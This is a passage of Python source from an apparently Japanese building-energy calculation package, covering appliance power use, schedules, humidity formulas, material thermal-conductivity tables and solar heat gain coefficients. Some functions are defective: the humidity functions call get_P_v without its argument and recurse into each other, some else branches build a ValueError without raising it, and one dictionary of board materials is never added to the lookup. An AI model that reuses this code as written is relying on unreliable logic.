def get_P_Elc_audio_microsystem_with_md_listening(P_Elc_audio_microsystem_with_md_rtd):
"""聴取時の消費電力を計算する
Parameters
----------
P_Elc_audio_microsystem_with_md_rtd : float
定格消費電力, W
Returns
----------
P_Elc_audio_microsystem_with_md_listening : float
聴取時消費電力, W
"""
P_Elc_audio_microsystem_with_md_listening = \
0.4 * P_Elc_audio_microsystem_with_md_rtd
return P_Elc_audio_microsystem_with_md_listening
def get_P_Elc_audio_microsystem_with_md_standby(P_Elc_audio_microsystem_with_md_standby_rtd):
"""待機時の消費電力を計算する
Parameters
----------
P_Elc_audio_microsystem_with_md_standby_rtd : float
定格消費電力, W
Returns
----------
P_Elc_audio_microsystem_with_md_standby : float
聴取時消費電力, W
"""
P_Elc_audio_microsystem_with_md_standby = \
P_Elc_audio_microsystem_with_md_standby_rtd
return P_Elc_audio_microsystem_with_md_standby
```
#### File: src/pyhees/section10_j1_k.py
```python
def get_E_Elc_cleaner_d_t(P_Elc_cleaner_rtd, t_cleaner_oprt_d_t):
"""時刻別消費電力量を計算する
Parameters
----------
P_Elc_cleaner_rtd : float
定格消費電力, W
t_cleaner_oprt_d_t : ndarray(N-dimensional array)
1年間の全時間の使用時間を格納したND配列, h
d日t時の使用時間が年開始時から8760個連続して格納されている
Returns
----------
E_Elc_cleaner_d_t : ndarray(N-dimensional array)
1年間の全時間の消費電力量を格納したND配列, kWh
d日t時の消費電力量が年開始時から8760個連続して格納されている
"""
P_Elc_cleaner_oprt = get_P_Elc_cleaner_oprt(P_Elc_cleaner_rtd)
E_Elc_cleaner_oprt_d_t = P_Elc_cleaner_oprt * t_cleaner_oprt_d_t
E_Elc_cleaner_oprt_d_t = E_Elc_cleaner_oprt_d_t * 10**(-3)
return E_Elc_cleaner_oprt_d_t
def get_P_Elc_cleaner_oprt(P_Elc_cleaner_rtd):
"""使用時の消費電力を計算する
Parameters
----------
P_Elc_cleaner_rtd : float
定格消費電力, W
Returns
----------
P_Elc_cleaner_oprt : float
使用時の消費電力, W
"""
# P_Elc_cleaner_oprt = 1.0355 * P_Elc_cleaner_rtd
# 試算結果_家電の電力消費量.xlsx では、強制的に以下の値となる
P_Elc_cleaner_oprt = 498.333333333333
return P_Elc_cleaner_oprt
```
#### File: src/pyhees/section10_j1_o.py
```python
def get_E_Elc_dryer_d_t(P_Elc_dryer_rtd, t_dryer_oprt_d_t, number_of_people):
"""時刻別消費電力量を計算する
Parameters
----------
P_Elc_dryer_rtd : float
定格消費電力, W
t_dryer_oprt_d_t : ndarray(N-dimensional array)
1年間の全時間の使用時間を格納したND配列, h
d日t時の使用時間が年開始時から8760個連続して格納されている
number_of_people : int
世帯人数, 人
Returns
----------
E_Elc_dryer_d_t : ndarray(N-dimensional array)
1年間の全時間の消費電力量を格納したND配列, kWh
d日t時の消費電力量が年開始時から8760個連続して格納されている
"""
P_Elc_dryer_oprt = get_P_Elc_dryer_oprt(P_Elc_dryer_rtd, number_of_people)
E_Elc_dryer_d_t = P_Elc_dryer_oprt * t_dryer_oprt_d_t
E_Elc_dryer_d_t = E_Elc_dryer_d_t * 10**(-3)
return E_Elc_dryer_d_t
def get_P_Elc_dryer_oprt(P_Elc_dryer_rtd, number_of_people):
"""使用時の消費電力を計算する
Parameters
----------
P_Elc_dryer_rtd : float
定格消費電力, W
number_of_people : int
世帯人数, 人
Returns
----------
P_Elc_dryer_oprt : float
使用時の消費電力, W
"""
if number_of_people == 4:
P_Elc_dryer_oprt = 0.8974 * P_Elc_dryer_rtd
elif number_of_people == 3:
P_Elc_dryer_oprt = 0.8974 * P_Elc_dryer_rtd * 3 / 3
elif number_of_people == 2:
P_Elc_dryer_oprt = 0.8974 * P_Elc_dryer_rtd * 2 / 3
elif number_of_people == 1:
P_Elc_dryer_oprt = 0.8974 * P_Elc_dryer_rtd * 1 / 3
else:
raise ValueError(number_of_people)
return P_Elc_dryer_oprt
```
#### File: src/pyhees/section11_3.py
```python
import os
import pandas as pd
from functools import lru_cache
@lru_cache()
def load_schedule():
"""スケジュール読み込み
Args:
Returns:
DateFrame: スケジュール
"""
path = os.path.join(os.path.dirname(__file__), 'data', 'schedule.csv')
return pd.read_csv(path)
def get_schedule_ac(df):
"""暖冷房スケジュール
Args:
df(DateFrame): スケジュール
Returns:
ndarray: 暖冷房スケジュール
"""
return df['暖冷房'].values
def get_schedule_v(df):
"""換気スケジュール
Args:
df(DateFrame): スケジュール
Returns:
ndarray: 換気スケジュール
"""
return df['換気'].values
def get_schedule_hw(df):
"""給湯スケジュール
Args:
df(DateFrame): スケジュール
Returns:
ndarray: 給湯スケジュール
"""
return df['給湯'].values
def get_schedule_l(df):
"""照明スケジュール
Args:
df(DateFrame): スケジュール
Returns:
ndarray: 照明スケジュール
"""
return df['照明'].values
def get_schedule_app(df):
"""家電スケジュール
Args:
df(DateFrame): スケジュール
Returns:
ndarray: 家電スケジュール
"""
return df['家電'].values
def get_schedule_cc(df):
"""調理スケジュール
Args:
df(DateFrame): スケジュール
Returns:
ndarray: 調理スケジュール
"""
return df['調理'].values
```
#### File: src/pyhees/section11_5.py
```python
import numpy as np
# ============================================================================
# 5. 相対湿度
# ============================================================================
def get_h(Theta):
"""(1)
Args:
Theta: 空気温度(℃)
Returns:
相対湿度(%)
"""
P_v = get_P_v()
P_vs = get_P_vs(Theta)
return (P_v / P_vs) * 100
# ============================================================================
# 6. 絶対湿度
# ============================================================================
def get_X(Theta):
"""(2)
Args:
Theta: 空気温度(℃)
Returns:
絶対湿度(kg/kg(DA))
"""
F = get_F()
P_v = get_P_v()
return 0.622 * (P_v / (F - P_v))
def get_X_s(Theta):
"""(3)
Args:
Theta: 空気温度(℃)
Returns:
飽和空気の絶対湿度(kg/kg(DA))
"""
F = get_F()
P_vs = get_P_vs(Theta)
return 0.622 * (P_vs / (F - P_vs))
# ============================================================================
# 7. 水蒸気圧
# ============================================================================
def get_P_v(Theta):
"""(4)
Args:
Theta: 空気温度(℃)
Returns:
水蒸気圧(Pa)
"""
F = get_F()
X = get_X(Theta)
return F * (X / (0.622 + X))
# ============================================================================
# 8. 飽和水蒸気圧
# ============================================================================
def get_P_vs(Theta):
"""(5a)(5b)
Args:
Theta: 空気温度(℃)
Returns:
飽和水蒸気圧(Pa)
"""
# 表1 式(5b)中の係数
a1 = -6096.9385
a2 = 21.2409642
a3 = -0.02711193
a4 = 0.00001673952
a5 = 2.433502
b1 = -6024.5282
b2 = 29.32707
b3 = 0.010613863
b4 = -0.000013198825
b5 = -0.49382577
T = get_T(Theta)
# (5b)
if Theta > 0:
k = a1 / T + a2 + a3 * T + a4 * T ** 2 + a5 * np.log(T)
else:
k = b1 / T + b2 + b3 * T + b4 * T ** 2 + b5 * np.log(T)
# (5a)
return np.exp(k)
# ============================================================================
# 9. 絶対温度
# ============================================================================
def get_T(Theta):
"""(6)
Args:
Theta: 空気温度(℃)
Returns:
絶対温度(K)
"""
return Theta + 273.16
# ============================================================================
# 10. その他
# ============================================================================
# 大気圧 (Pa)
def get_F():
""" """
return 101325
```
#### File: src/pyhees/section3_1_heatingday.py
```python
import numpy as np
# ============================================================================
# 10. 暖房日
# ============================================================================
def get_heating_flag_d(L_dash_H_R_d_t_i):
"""暖房日 = 暖房使用が発生することが見込まれる日
Args:
L_dash_H_R_d_t_i(ndarray): 標準住戸の負荷補正前の暖房負荷 (MJ/h)
Returns:
ndarray: 暖房使用が発生することが見込まれる日
"""
L_dash_H_R_d_t = np.sum(L_dash_H_R_d_t_i, axis=0)
L_dash_H_R_d = np.sum(L_dash_H_R_d_t.reshape(365, 24), axis=1)
heating_flag_d = np.ones(365)
heating_flag_d[1:] = L_dash_H_R_d[0:364] > 0
return heating_flag_d
```
#### File: src/pyhees/section3_3_a.py
```python
def calc_lambda(material):
"""表1と表2より材質の熱伝導率を得る
Args:
material(str): 建材等名称
Returns:
float: 熱伝導率λ(W/mK)
"""
if material != None:
try:
return get_table_1(material)
except KeyError:
try:
return get_table_2(material)
except KeyError:
raise ValueError(material)
def get_table_1(material):
"""表1 建材等の熱物性値
Args:
material(str): 建材等名称
Returns:
float: 熱伝導率λ(W/mK)
"""
material_dict = {}
# 金属:鋼 アルミニウム 銅 ステンレス鋼
metal_dict = {'Steel': 55, 'Aluminum': 210,
'Copper': 370, 'StainlessSteel': 15}
material_dict.update(metal_dict)
# 岩石・土壌:岩石 土壌
rock_mud_dict = {'Rock': 3.1, 'Mud': 1.0}
material_dict.update(rock_mud_dict)
# コンクリート系材料:コンクリート 軽量コンクリート(軽量1種) 軽量コンクリート(軽量2種)
# コンクリートブロック(重量) コンクリートブロック(軽量) セメント・モルタル 押出成型セメント板
concrete_dict = {'Concrete': 1.6, 'LC1': 0.8, 'LC2': 0.5,
'CBheavy': 1.1, 'CBlight': 0.53, 'Mortar': 1.5, 'ECP': 0.40}
material_dict.update(concrete_dict)
# 非木質系壁材・下地材:せっこうプラスター しっくい 土壁 ガラス
# タイル れんが かわら ロックウール化粧吸音板 火山性ガラス質複層板
notwoood_dict = {'GypsumPlaster': 0.60, 'CementPlaster': 0.74, 'MudWall': 0.69, 'Glass': 1.0,
'Tile': 1.3, 'Brick': 0.64, 'RoofTile': 1.0, 'DressedRockwoolBoard': 0.064, 'Vsboard': 0.13}
material_dict.update(notwoood_dict)
# 木質系壁材・下地材:天然木材 合板 木毛セメント板 木片セメント板
# ハードファイバーボード(ハードボード) ミディアムデンシティファイバーボード(MDF) 直交集成板(CLTパネル)
wood_dict = {'Wood': 0.12, 'PlywoodBoard': 0.16, 'CementWoodWool': 0.13, 'CementWoodFlake': 0.15,
'HardFiberBoard': 0.17, 'MDF': 0.12, 'CLT': 0.12}
material_dict.update(wood_dict)
# 床材:ビニル系床材 FRP
# アスファルト類 畳 カーペット類
floor_dict = {'VinylFloor': 0.19, 'FRP': 0.26,
'Asphart': 0.11, 'Tatami': 0.083, 'Carpet': 0.08}
material_dict.update(floor_dict)
# グラスウール断熱材:グラスウール断熱材10K相当 グラスウール断熱材16K相当 グラスウール断熱材20K相当
# グラスウール断熱材24K相当 グラスウール断熱材32K相当
# 高性能グラスウール断熱材16K相当 高性能グラスウール断熱材24K相当 高性能グラスウール断熱材32K相当
# 高性能グラスウール断熱材40K相当 高性能グラスウール断熱材48K相当
# 吹込み用グラスウール13K相当 吹込み用グラスウール18K相当 吹込み用グラスウール30K相当 吹込み用グラスウール35K相当
gw_dict = {'GW10K': 0.050, 'GW16K': 0.045, 'GW20K': 0.042,
'GW24K': 0.038, 'GW32K': 0.036,
'HGW16K': 0.038, 'HGW24K': 0.036, 'HGW32K': 0.035,
'HGW40K': 0.034, 'HGW48K': 0.033,
'BlowingGW13K': 0.052, 'BlowingGW18K': 0.052, 'BlowingGW30K': 0.040, 'BlowingGW35K': 0.040}
material_dict.update(gw_dict)
# ロックウール断熱材:吹付けロックウール ロックウール断熱材(マット) ロックウール断熱材(フェルト) ロックウール断熱材(ボード)
# 吹込み用ロックウール25K相当 吹込み用ロックウール65K相当
rock_wool_dict = {'SprayedRockWool': 0.064, 'RockWoolMat': 0.038, 'RockWoolFelt': 0.038, 'RockWoolBoard': 0.036,
'BlowingRockWool25K': 0.047, 'BlowingRockWool65K': 0.039}
material_dict.update(rock_wool_dict)
# セルローズファイバー断熱材:吹込み用セルローズファイバー25K
# 吹込み用セルローズファイバー45K吹込み用セルローズファイバー55K
cellulose_dict = {'BlowingCelluloseFiber25K': 0.040,
'BlowingCelluloseFiber45K': 0.040, 'BlowingCelluloseFiber55K': 0.040}
material_dict.update(cellulose_dict)
# ポリスチレンフォーム断熱材:押出法ポリスチレンフォーム保温板1種 押出法ポリスチレンフォーム保温板2種 押出法ポリスチレンフォーム保温板3種
# A種ポリエチレンフォーム保温板1種2号 A種ポリエチレンフォーム保温板2種 ビーズ法ポリスチレンフォーム保温板特号
# ビーズ法ポリスチレンフォーム保温板1号 ビーズ法ポリスチレンフォーム保温板2号
# ビーズ法ポリスチレンフォーム保温板3号 ビーズ法ポリスチレンフォーム保温板4号
polyethylene_dict = {'XPSPlate1': 0.040, 'XPSPlate2': 0.034, 'XPSPlate3': 0.028,
'PolyethyleneFoam1': 0.042, 'PolyethyleneFoam2': 0.038, 'EPSPlateSP': 0.034,
'EPSPlate1': 0.036, 'EPSPlate2': 0.037,
'EPSPlate3': 0.040, 'EPSPlate4': 0.043}
material_dict.update(polyethylene_dict)
# ウレタンフォーム断熱材:硬質ウレタンフォーム保温板2種1号 硬質ウレタンフォーム保温板2種2号
urethane_dict = {'PUFPlate1': 0.023, 'PUFPlate2': 0.024}
material_dict.update(urethane_dict)
# フェノールフォーム断熱材:フェノールフォーム保温板1種1号 フェノールフォーム保温板1種2号
phenolic_dict = {'PhenolicFoamPlate1': 0.022, 'PhenolicFoamPlate2': 0.022}
material_dict.update(phenolic_dict)
return material_dict[material]
def get_table_2(material):
"""表2 JISで熱物性値の定めのある建材等の熱物性値
Args:
material(str): 建材名称
Returns:
float: 熱伝導率λ(W/mK)
"""
material_dict = {}
# コンクリート系材料:軽量気泡コンクリートパネル(ALCパネル)
concrete_dict = {'ALC': 0.19}
material_dict.update(concrete_dict)
# 非木質系壁材・下地材:せっこうボード/GB-R/GB-D/GB-L/GB-NC, せっこうボード/GB-S/GB-F, せっこうボード/GB-R-H/GB-S-H/GB-D-H,
# 0.8ケイ酸カルシウム板, 1.0ケイ酸カルシウム板
notwoood_dict = {'GB_R_D_L_NC': 0.221, 'GB_S_F': 0.241, 'GB_RH_SH_DH': 0.366,
'CalciumSilicateBoard08': 0.18, 'CalciumSilicateBoard10': 0.24}
# 木質系壁材・下地材:タタミボード, A級インシュレーションボード,
# シージングボード, パーティクルボード
wood_dict = {'TatamiBoard': 0.056, 'InsulationBoardA': 0.058,
'GypsumSheathingBoard': 0.067, 'ParticleBoard': 0.167}
material_dict.update(wood_dict)
# 床材:稲わら畳床, ポリスチレンフォームサンドイッチ稲わら畳床, タタミボードサンドイッチ稲わら畳床,
# 建材畳床(Ⅰ形), 建材畳床(Ⅱ形), 建材畳床(Ⅲ形), 建材畳床(K、N形)
floor_dict = {'RiceStrawTatamiFloor': 0.07, 'PFSRiceStrawTatamiFloor': 0.054, 'TBSRiceStrawTatamiFloor': 0.063,
'TatamiFloor1': 0.062, 'TatamiFloor2': 0.053, 'TatamiFloor3': 0.052, 'TatamiFloorKN': 0.050}
material_dict.update(floor_dict)
# グラスウール断熱材:通常品10-50, 通常品10-49, 通常品10-48, 通常品12-45, 通常品12-44,
# 通常品16-45, 通常品16-44, 通常品20-42, 通常品20-41, 通常品20-40,
# 通常品24-38, 通常品32-36, 通常品40-36, 通常品48-35, 通常品64-35, 通常品80-33, 通常品96-33,
# 高性能品HG10-47, 高性能品HG10-46, 高性能品HG10-45, 高性能品HG10-44, 高性能品HG10-43,
# 高性能品HG12-43, 高性能品HG12-42, 高性能品HG12-41, 高性能品HG14-38, 高性能品HG14-37,
# 高性能品HG16-38, 高性能品HG16-37, 高性能品HG16-36,
# 高性能品HG20-38, 高性能品HG20-37, 高性能品HG20-36, 高性能品HG20-35, 高性能品HG20-34,
# 高性能品HG24-36, 高性能品HG24-35, 高性能品HG24-34, 高性能品HG24-33,
# 高性能品HG28-35, 高性能品HG28-34, 高性能品HG28-33,
# 高性能品HG32-35, 高性能品HG32-34, 高性能品HG32-33,
# 高性能品HG36-34, 高性能品HG36-33, 高性能品HG36-32, 高性能品HG36-31,
# 高性能品HG38-34, 高性能品HG38-33, 高性能品HG38-32, 高性能品HG38-31,
# 高性能品HG40-34, 高性能品HG40-33, 高性能品HG40-32, 高性能品HG48-33, 高性能品HG48-32, 高性能品HG48-31
gw_dict = {'GW10_50': 0.05, 'GW10_49': 0.049, 'GW10_48': 0.048, 'GW12_45': 0.045, 'GW12_44': 0.044,
'GW16_45': 0.045, 'GW16_44': 0.044, 'GW20_42': 0.042, 'GW20_41': 0.041, 'GW20_40': 0.04,
'GW24_38': 0.038, 'GW32_36': 0.036, 'GW40_36': 0.036, 'GW48_35': 0.035, 'GW64_35': 0.035, 'GW80_33': 0.033, 'GW96_33': 0.033,
'HGW10_47': 0.047, 'HGW10_46': 0.046, 'HGW10_45': 0.045, 'HGW10_44': 0.044, 'HGW10_43': 0.043,
'HGW12_43': 0.043, 'HGW12_42': 0.042, 'HGW12_41': 0.041, 'HGW14_38': 0.038, 'HGW14_37': 0.037,
'HGW16_38': 0.038, 'HGW16_37': 0.037, 'HGW16_36': 0.036,
'HGW20_38': 0.038, 'HGW20_37': 0.037, 'HGW20_36': 0.036, 'HGW20_35': 0.035, 'HGW20_34': 0.034,
'HGW24_36': 0.036, 'HGW24_35': 0.035, 'HGW24_34': 0.034, 'HGW24_33': 0.033,
'HGW28_35': 0.035, 'HGW28_34': 0.034, 'HGW28_33': 0.033,
'HGW32_35': 0.035, 'HGW32_34': 0.034, 'HGW32_33': 0.033,
'HGW36_34': 0.034, 'HGW36_33': 0.033, 'HGW36_32': 0.032, 'HGW36_31': 0.031,
'HGW38_34': 0.034, 'HGW38_33': 0.033, 'HGW38_32': 0.032, 'HGW38_31': 0.031,
'HGW40_34': 0.034, 'HGW40_33': 0.033, 'HGW40_32': 0.032, 'HGW48_33': 0.033, 'HGW48_32': 0.032, 'HGW48_31': 0.031}
material_dict.update(gw_dict)
# ロックウール断熱材:LA, LB, LC, LD,
# MA, MB, MC,
# HA, HB, HC,
rock_wool_dict = {'RockWoolLA': 0.045, 'RockWoolLB': 0.043, 'RockWoolLC': 0.041, 'RockWoolLD': 0.039,
'RockWoolMA': 0.038, 'RockWoolMB': 0.037, 'RockWoolMC': 0.036,
'RockWoolHA': 0.036, 'RockWoolHB': 0.035, 'RockWoolHC': 0.034}
material_dict.update(rock_wool_dict)
# インシュレーションファイバー断熱材ファイバーマット
material_dict.update({'InsulationFiberMat': 0.040})
# インシュレーションファイバー断熱材ファイバーボード
material_dict.update({'InsulationFiberBoard': 0.052})
# ビーズ法ポリスチレンフォーム断熱材:1号, 2号, 3号, 4号
eps_dict = {'EPS1': 0.034, 'EPS2': 0.036, 'EPS3': 0.038, 'EPS4': 0.041}
material_dict.update(eps_dict)
# 押出法ポリスチレンフォーム断熱材:1種bA, 1種bB, 1種bC, 2種bA, 2種bB, 2種bC,
# 3種aA, 3種aB, 3種aC, 3種aD,
# 3種bA, 3種bB, 3種bC, 3種bD
xps_dict = {'XPS1bA': 0.04, 'XPS1bB': 0.038, 'XPS1bC': 0.036, 'XPS2bA': 0.034, 'XPS2bB': 0.032, 'XPS2bC': 0.03,
'XPS3aA': 0.028, 'XPS3aB': 0.026, 'XPS3aC': 0.024, 'XPS3aD': 0.022,
'XPS3bA': 0.028, 'XPS3bB': 0.026, 'XPS3bC': 0.024, 'XPS3bD': 0.022}
material_dict.update(xps_dict)
# 硬質ウレタンフォーム断熱材:1種, 2種1号,
# 2種2号, 2種3号, 2種4号
puf_dict = {'PUF1': 0.029, 'PUF2_1': 0.023,
'PUF2_2': 0.024, 'PUF2_3': 0.027, 'PUF2_4': 0.028}
material_dict.update(puf_dict)
# 吹付け硬質ウレタンフォーム:A種1,
# A種1H, A種3
spuf_dict = {'SprayedPUFA1': 0.034,
'SprayedPUFA1H': 0.026, 'SprayedPUFA3': 0.04}
material_dict.update(spuf_dict)
# ポリエチレンフォーム断熱材:1種1号, 1種2号,
# 2種, 3種
polyethylene_dict = {'PolyethyleneFoam1_1': 0.042, 'PolyethyleneFoam1_2': 0.042,
'PolyethyleneFoam2': 0.038, 'PolyethyleneFoam3': 0.034}
material_dict.update(polyethylene_dict)
# フェノールフォーム断熱材:1種1号AⅠAⅡ, 1種1号BⅠBⅡ, 1種1号CⅠCⅡ, 1種1号DⅠDⅡ, 1種1号EⅠEⅡ,
# 1種2号AⅠAⅡ, 1種2号BⅠBⅡ, 1種2号CⅠCⅡ, 1種2号DⅠDⅡ, 1種2号EⅠEⅡ,
# 1種3号AⅠAⅡ, 1種3号BⅠBⅡ, 1種3号CⅠCⅡ, 1種3号DⅠDⅡ, 1種3号EⅠEⅡ,
# 2種1号AⅠAⅡ, 2種2号AⅠAⅡ, 2種3号AⅠAⅡ, 3種1号AⅠAⅡ
phenolic_dict = {'PhenolicFoam11_A1_A2': 0.022, 'PhenolicFoam11_B1_B2': 0.021, 'PhenolicFoam11_C1_C2': 0.02, 'PhenolicFoam11_D1_D2': 0.019, 'PhenolicFoam11_E1_E2': 0.018,
'PhenolicFoam12_A1_A2': 0.022, 'PhenolicFoam12_B1_B2': 0.021, 'PhenolicFoam12_C1_C2': 0.02, 'PhenolicFoam12_D1_D2': 0.019, 'PhenolicFoam12_E1_E2': 0.018,
'PhenolicFoam13_A1_A2': 0.022, 'PhenolicFoam13_B1_B2': 0.021, 'PhenolicFoam13_C1_C2': 0.02, 'PhenolicFoam13_D1_D2': 0.019, 'PhenolicFoam13_E1_E2': 0.018,
'PhenolicFoam21_A1_A2': 0.036, 'PhenolicFoam22_A1_A2': 0.034, 'PhenolicFoam23_A1_A2': 0.028, 'PhenolicFoam31_A1_A2': 0.035}
material_dict.update(phenolic_dict)
try:
return material_dict[material]
except KeyError:
raise ValueError(material)
def calc_R_si_R_se(part, Outside):
"""表3.1と3.2から表面熱伝達抵抗を求める
Args:
part(str): Roof'(屋根)または'Ceiling'(天井)または'ExternalWall'(外壁)または'Floor'(床)または
'BoundaryWall'(界壁)または'BoundaryCeiling'(上階側界床)または'BoundaryFloor'(下階側界床)
Outside(str): 室外側は外気かどうか
'Yes'または'No'
Returns:
tuple: 熱的境界内側の表面熱伝達抵抗(m2K/W), 熱的境界外側の表面熱伝達抵抗(m2K/W)
"""
if part == 'Roof' or part == 'Ceiling' or part == 'ExternalWall' or part == 'Floor':
return get_table_3_1(part, Outside)
elif part == 'BoundaryWall' or part == 'BoundaryCeiling' or part == 'BoundaryFloor':
return get_table_3_2(part)
else:
raise ValueError(part)
def get_table_3_1(part, Outside):
"""表3.1 表面熱伝達抵抗
Args:
part(str): Roof'(屋根)または'Ceiling'(天井)または'ExternalWall'(外壁)または'Floor'(床)
Outside(str): 室外側は外気かどうか
'Yes'または'No'
Returns:
tuple: 熱的境界内側(室内側)の表面熱伝達抵抗(m2K/W), 熱的境界外側(外気側)の表面熱伝達抵抗(m2K/W)
"""
# 熱的境界内側 屋根 天井
# 外壁 床
R_si_dict = {'Roof': 0.09, 'Ceiling': 0.09,
'ExternalWall': 0.11, 'Floor': 0.15}
# 熱的境界外側 屋根 天井
# 外壁 床
R_se_dict = {'Roof': {'Yes': 0.04, 'No': 0.09}, 'Ceiling': {'Yes': 0.00, 'No': 0.09}, # 天井が外気に直接接することはない?表中の'-'とは
'ExternalWall': {'Yes': 0.04, 'No': 0.11}, 'Floor': {'Yes': 0.04, 'No': 0.15}}
try:
R_si = R_si_dict[part]
R_se_out = R_se_dict[part]
try:
R_se = R_se_out[Outside]
return R_si, R_se
except KeyError:
raise ValueError(Outside)
except KeyError:
raise ValueError(part)
def get_table_3_2(part):
"""表3.2 表面熱伝達抵抗(界壁・界床の場合)
Args:
part(str): BoundaryWall'(界壁)または'BoundaryCeiling'(上階側界床)または'BoundaryFloor'(下階側界床)
Returns:
tuple: 対象住戸の室内側表面熱伝達抵抗(m2K/W), 隣接住戸の室内側表面熱伝達抵抗(m2K/W)
"""
# 熱的境界外側=隣接住戸の室内側表面熱伝達抵抗・熱的境界内側=対象住戸の室内側表面熱伝達抵抗???
# 対象住戸の室内側表面熱伝達抵抗
# 界壁
# 上階側界床 下階側界床
R_si_dict = {'BoundaryWall': 0.11,
'BoundaryCeiling': 0.09, 'BoundaryFloor': 0.15}
# 隣接住戸の室内側表面熱伝達抵抗
# 界壁
# 上階側界床 下階側界床
R_se_dict = {'BoundaryWall': 0.11,
'BoundaryCeiling': 0.09, 'BoundaryFloor': 0.15}
try:
return R_si_dict[part], R_se_dict[part]
except KeyError:
raise ValueError(part)
def get_table_4(air_type):
"""表4 外皮の内側にある空気層の熱抵抗
Args:
air_type(str): 空気層の種類
'AirTight'(面材で密閉された空気層)または'OnSiteNonConnected'(他の空間と連通していない空気層)または
'OnSiteConnected'(他の空間と連通している空気層)
Returns:
float: 外皮の内側にある空気層の熱抵抗
"""
R_dict = {'AirTight': 0.09, 'OnSiteNonConnected': 0, 'OnSiteConnected': 0}
try:
return R_dict[air_type]
except KeyError:
raise ValueError(air_type)
```
#### File: src/pyhees/section3_4_b_2.py
```python
def get_f_H_i():
"""開口部iの暖房期の取得日射熱補正係数
Args:
Returns:
float: 開口部iの暖房期の取得日射熱補正係数
"""
return 0.51
def get_f_C_i():
"""開口部iの冷房期の取得日射熱補正係数
Args:
Returns:
float: 開口部iの冷房期の取得日射熱補正係数
"""
return 0.93
### HEESENV-66(2020/08/27)
# 簡易計算では仕様変更前の計算方法を用いるため、仕様変更前のものを残す
# 以下、仕様変更前
###
# ============================================================================
# 第三章 暖冷房負荷と外皮性能
# 第四節 日射熱取得率
# Ver.11(住宅・住戸の外皮性能の計算プログラム Ver.02.01~)
# ----------------------------------------------------------------------------
# 付録B 大部分がガラスで構成されている窓等の開口部における取得日射熱補正係数
# ----------------------------------------------------------------------------
# B.2 ガラスの仕様の区分
# ============================================================================
def get_glass_spec_category(glass_spec_name):
"""ガラスの仕様の区分はガラスの仕様に応じて返す
Args:
glass_spec_name(str): ガラスの仕様
Returns:
int: ガラスの仕様の区分はガラスの仕様に応じて返す
"""
# 表3 ガラスの仕様の区分
table_3 = {
'2枚以上のガラス表面にLow-E膜を使用したLow-E三層複層ガラス(日射取得型)': 6,
'2枚以上のガラス表面にLow-E膜を使用したLow-E三層複層ガラス(日射遮蔽型)': 3,
'Low-E三層複層ガラス(日射取得型)': 6,
'Low-E三層複層ガラス(日射遮蔽型)': 6,
'Low-E二層複層ガラス(日射取得型)': 3,
'Low-E二層複層ガラス(日射遮蔽型)': 4,
'二層複層ガラス': 2,
'単板ガラス2枚を組み合わせたもの': 2,
'単板ガラス': 1,
'単板ガラスと複層ガラスを組み合わせたもの': 5,
'単板ガラスとLow-E複層ガラスを組み合わせたもの(日射取得型)': 7,
'単板ガラスとLow-E複層ガラスを組み合わせたもの(日射遮蔽型)': 6,
}
return table_3[glass_spec_name]
```
#### File: src/pyhees/section3_4_b_3.py
```python
def get_f_H_i(region, direction, y1, y2, z):
"""開口部iの暖房期の取得日射熱補正係数
Args:
region(int): 省エネルギー地域区分
direction(str): 外皮の部位の方位
y1(float): 日除け下端から窓上端までの垂直方向の距離 (mm)
y2(float): 窓の開口高さ寸法 (mm)
z(float): 壁面からの日除けの張り出し寸法(ひさし等のオーバーハング型日除けの出寸法は壁表面から先端までの寸法とする)(mm)
Returns:
float: 開口部iの暖房期の取得日射熱補正係数
"""
# 暖房期における1地域から7地域までの南東面・南面・南西面 --- 式(1a)
if (region in [1,2,3,4,5,6,7] and direction in ['南東', '南', '南西']):
return min(0.01 * (5 + 20 * ((3*y1 + y2) / z)), 0.72)
# 暖房期における1地域から7地域までの南東面・南面・南西面以外 --- 式(1b)
elif (region in [1,2,3,4,5,6,7] and not(direction in ['南東', '南', '南西'])):
return min(0.01 * (10 + 15 * ((2*y1 + y2) / z)), 0.72)
else:
ValueError("invalid value in region or direction")
def get_f_C_i(region, direction, y1, y2, z):
"""開口部iの冷房期の取得日射熱補正係数
Args:
region(int): 省エネルギー地域区分
direction(str): 外皮の部位の方位
y1(float): 日除け下端から窓上端までの垂直方向の距離 (mm)
y2(float): 窓の開口高さ寸法 (mm)
z(float): 壁面からの日除けの張り出し寸法(ひさし等のオーバーハング型日除けの出寸法は壁表面から先端までの寸法とする)(mm)
Returns:
float: 開口部iの冷房期の取得日射熱補正係数
"""
Direction_dict = {'Top':'上面', 'N':'北', 'NE':'北東', 'E':'東', 'SE':'南東',
'S':'南', 'SW':'南西', 'W':'西', 'NW':'北西', 'Bottom':'下面'}
# 冷房期における1地域から7地域までの南面 --- 式(2a)
if (region in [1,2,3,4,5,6,7] and Direction_dict[direction] in ['南']):
return min(0.01 * (24 + 9 * ((3*y1 + y2) / z)), 0.93)
# 冷房期における1地域から7地域までの南面以外及び8地域の南東面・南面・南西面以外 --- 式(2b)
elif ((region in [1,2,3,4,5,6,7] and not(Direction_dict[direction] in ['南'])) or (region == 8 and not(Direction_dict[direction] in ['南東', '南', '南西']))):
return min(0.01 * (16 + 24 * ((2*y1 + y2) / z)), 0.93)
# 冷房期における8地域の南東面・南面・南西面 --- 式(2c)
elif (region == 8 and Direction_dict[direction] in ['南東', '南', '南西']):
return min(0.01 * (16 + 19 * ((2*y1 + y2) / z)), 0.93)
else:
ValueError("invalid value in region or direction")
```
#### File: src/pyhees/section3_4_common.py
```python
def get_eta_H_i(gamma_H_i, U_i):
"""一般部位の暖房期の日射熱取得率(熱貫流率から計算) (1)
Args:
gamma_H_i(float): 開口部の暖房期の日除けの効果係数 (-)
U_i(float): 開口部の熱貫流率 (W/m2K)
Returns:
float: 一般部位の暖房期の日射熱取得率(熱貫流率から計算) ((W/m2)/(W/m2))(1)
"""
return 0.034 * gamma_H_i * U_i
def get_eta_C_i(gamma_C_i, U_i):
"""一般部位の冷房期の日射熱取得率(熱貫流率から計算) (2)
Args:
gamma_C_i(float): 一般部位iの冷房期の日除けの効果係数
U_i(float): 一般部位iの熱貫流率 (W/m2K)
Returns:
float: 一般部位の冷房期の日射熱取得率(熱貫流率から計算) ((W/m2)/(W/m2))(2)
"""
return 0.034 * gamma_C_i * U_i
```
#### File: src/pyhees/section4_4_a.py
```python
def get_q_max_H(A_HCZ):
"""最大暖房能力
Args:
A_HCZ(float): 暖冷房区画の床面積
Returns:
float: 最大暖房能力
"""
return 240.1 * A_HCZ # (1)
# ============================================================================
# A.3 連続運転時最小能力
# ============================================================================
def get_q_min_H(q_max_H):
"""連続運転時最小能力
